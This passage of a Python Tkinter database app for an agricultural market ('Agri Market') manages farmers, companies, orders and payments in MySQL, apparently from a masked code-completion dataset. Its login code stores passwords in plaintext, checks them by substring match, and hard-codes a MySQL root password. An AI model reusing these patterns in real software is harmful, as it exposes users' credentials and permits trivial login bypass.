Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\ndef check_pass():\n global root, T1, T2, T3\n try:\n with open('password.txt', 'r') as f:\n lines = f.read()\n if T1.get() + '=' + T2.get() in lines and T1.get(\n ) != '' and T2.get() != '':\n entity_page()\n else:\n label = Label(root, text=\n 'Invalid username or password.Try again', font=(\n 'times new roman', 15))\n label.place(x=200, y=100)\n except:\n label = Label(root, text='Invalid username or password.Try again',\n font=('times new roman', 15))\n label.place(x=200, y=100)\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\ndef farmer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_farmer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_farmer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_farmer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_farmer)\n Button.place(x=410, y=50)\n view_farmer()\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\ndef update():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n e6 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_farmer()\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=search)\n Button.place(x=400, y=400)\n\n\ndef search():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=farmer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['farmer id: ', 'farmer name: ', 'farmer phone: ',\n 'farmer mail: ', 'farmer locality: ', 'farmer address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Farmer Id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_farmer()\n\n\ndef company():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_company)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_company)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_company)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_company)\n Button.place(x=410, y=50)\n view_company()\n\n\ndef view_company():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('c_id', 'c_name', 'c_address'),\n xscrollcommand=x_scroll.set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('c_id', text='Company Id')\n table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\ndef fertilizer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer Table', font=('Times new roman', \n 15), bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_fer)\n Button.place(x=110, y=50)\n Button = 